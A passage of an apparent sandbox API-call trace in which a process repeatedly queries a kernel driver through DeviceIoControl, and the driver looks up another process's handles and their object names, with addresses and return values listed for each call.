ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.418] PsAcquireProcessExitSynchronization () returned 0x0 [0148.418] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.418] ObReferenceObjectByHandle (in: Handle=0x1234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002525f20, HandleInformation=0x0) returned 0x0 [0148.418] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.418] PsReleaseProcessExitSynchronization () returned 0x2 [0148.418] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.418] ObQueryNameString (in: Object=0xfffffa8002525f20, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.419] ObfDereferenceObject (Object=0xfffffa8002525f20) returned 0x11 [0148.419] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.419] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.419] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.419] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.419] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.419] PsAcquireProcessExitSynchronization () returned 0x0 [0148.419] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.419] ObReferenceObjectByHandle (in: Handle=0x1240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800254f960, HandleInformation=0x0) returned 0x0 [0148.419] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.419] PsReleaseProcessExitSynchronization () returned 0x2 [0148.420] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.420] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.420] ObfDereferenceObject (Object=0xfffffa800254f960) returned 0x1 [0148.420] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.420] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.420] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0148.420] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.420] PsAcquireProcessExitSynchronization () returned 0x0 [0148.420] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.420] ObReferenceObjectByHandle (in: Handle=0x1248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025536e0, HandleInformation=0x0) returned 0x0 [0148.420] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.421] PsReleaseProcessExitSynchronization () returned 0x2 [0148.421] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.421] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.421] ObfDereferenceObject (Object=0xfffffa80025536e0) returned 0x1 [0148.421] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.421] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.421] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.421] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.421] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.421] PsAcquireProcessExitSynchronization () returned 0x0 [0148.421] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.421] ObReferenceObjectByHandle (in: Handle=0x1290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b618a0, HandleInformation=0x0) returned 0x0 [0148.422] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.422] PsReleaseProcessExitSynchronization () returned 0x2 [0148.422] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.422] ObQueryNameString (in: Object=0xfffff8a001b618a0, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.422] ObfDereferenceObject (Object=0xfffff8a001b618a0) returned 0x1 [0148.422] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.422] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.422] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.422] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.422] PsAcquireProcessExitSynchronization () returned 0x0 [0148.423] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.423] ObReferenceObjectByHandle (in: Handle=0x1294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b9c6c0, HandleInformation=0x0) returned 0x0 [0148.423] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.423] PsReleaseProcessExitSynchronization () returned 0x2 [0148.423] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.423] ObQueryNameString (in: Object=0xfffff8a001b9c6c0, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.423] ObfDereferenceObject (Object=0xfffff8a001b9c6c0) returned 0x1 [0148.423] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.423] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.423] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.424] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0148.424] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.424] PsAcquireProcessExitSynchronization () returned 0x0 [0148.424] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.424] ObReferenceObjectByHandle (in: Handle=0x1298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0148.424] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.424] PsReleaseProcessExitSynchronization () returned 0x2 [0148.424] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.424] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe9044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.424] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0148.424] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.425] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.425] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.425] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.425] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.425] PsAcquireProcessExitSynchronization () returned 0x0 [0148.425] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.425] ObReferenceObjectByHandle (in: Handle=0x12a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0148.425] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.425] PsReleaseProcessExitSynchronization () returned 0x2 [0148.426] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.426] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9e044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.426] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0148.426] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.426] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.426] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.426] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0148.426] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.426] PsAcquireProcessExitSynchronization () returned 0x0 [0148.427] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.427] ObReferenceObjectByHandle (in: Handle=0x12ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0148.427] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.427] PsReleaseProcessExitSynchronization () returned 0x2 [0148.427] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.427] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002faa044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002faa044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.427] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0148.427] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.428] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.428] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.428] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.428] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.428] PsAcquireProcessExitSynchronization () returned 0x0 [0148.428] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.428] ObReferenceObjectByHandle (in: Handle=0x12b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b3eb10, HandleInformation=0x0) returned 0x0 [0148.428] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.428] PsReleaseProcessExitSynchronization () returned 0x2 [0148.428] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.429] ObQueryNameString (in: Object=0xfffff8a001b3eb10, ObjectNameInfo=0xfffffa8002fd0584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd0584, ReturnLength=0xfffff88005163550) returned 0x0 [0148.429] ObfDereferenceObject (Object=0xfffff8a001b3eb10) returned 0x1 [0148.429] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.429] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.429] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.429] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.429] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.429] PsAcquireProcessExitSynchronization () returned 0x0 [0148.429] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.430] ObReferenceObjectByHandle (in: Handle=0x12b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b55a60, HandleInformation=0x0) returned 0x0 [0148.430] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.430] PsReleaseProcessExitSynchronization () returned 0x2 [0148.430] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.430] ObQueryNameString (in: Object=0xfffff8a001b55a60, ObjectNameInfo=0xfffffa80030277c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030277c4, ReturnLength=0xfffff88005163550) returned 0x0 [0148.430] ObfDereferenceObject (Object=0xfffff8a001b55a60) returned 0x1 [0148.430] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.430] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.431] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.431] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.431] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.431] PsAcquireProcessExitSynchronization () returned 0x0 [0148.431] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.431] ObReferenceObjectByHandle (in: Handle=0x12b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0148.431] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.431] PsReleaseProcessExitSynchronization () returned 0x2 [0148.431] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.431] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.432] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0148.432] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.432] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.432] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.432] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.432] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.432] PsAcquireProcessExitSynchronization () returned 0x0 [0148.433] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.433] ObReferenceObjectByHandle (in: Handle=0x12c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0148.433] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.433] PsReleaseProcessExitSynchronization () returned 0x2 [0148.433] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.433] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe6044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.433] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0148.433] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.433] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.433] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.433] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.433] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.433] PsAcquireProcessExitSynchronization () returned 0x0 [0148.433] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.434] ObReferenceObjectByHandle (in: Handle=0x12cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b56230, HandleInformation=0x0) returned 0x0 [0148.434] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.434] PsReleaseProcessExitSynchronization () returned 0x2 [0148.434] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.434] ObQueryNameString (in: Object=0xfffff8a001b56230, ObjectNameInfo=0xfffffa8002fe7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe7044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.434] ObfDereferenceObject (Object=0xfffff8a001b56230) returned 0x1 [0148.434] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.434] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.434] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.434] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x10c, lpOverlapped=0x0) returned 1 [0148.434] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.434] PsAcquireProcessExitSynchronization () returned 0x0 [0148.435] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.435] ObReferenceObjectByHandle (in: Handle=0x12d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ec1210, HandleInformation=0x0) returned 0x0 [0148.435] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.435] PsReleaseProcessExitSynchronization () returned 0x2 [0148.435] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.435] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fea044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fea044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.435] ObfDereferenceObject (Object=0xfffffa8001ec1210) returned 0x11 [0148.435] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.435] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.435] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.435] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0148.435] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.435] PsAcquireProcessExitSynchronization () returned 0x0 [0148.436] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.436] ObReferenceObjectByHandle (in: Handle=0x12dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0148.436] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.436] PsReleaseProcessExitSynchronization () returned 0x2 [0148.436] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.436] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdc044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.436] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0148.436] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.436] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.436] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.436] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0148.436] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.436] PsAcquireProcessExitSynchronization () returned 0x0 [0148.436] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.436] ObReferenceObjectByHandle (in: Handle=0x12ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0148.436] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.437] PsReleaseProcessExitSynchronization () returned 0x2 [0148.437] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.437] ObQueryNameString (in: Object=0xfffffa8002828cd0, 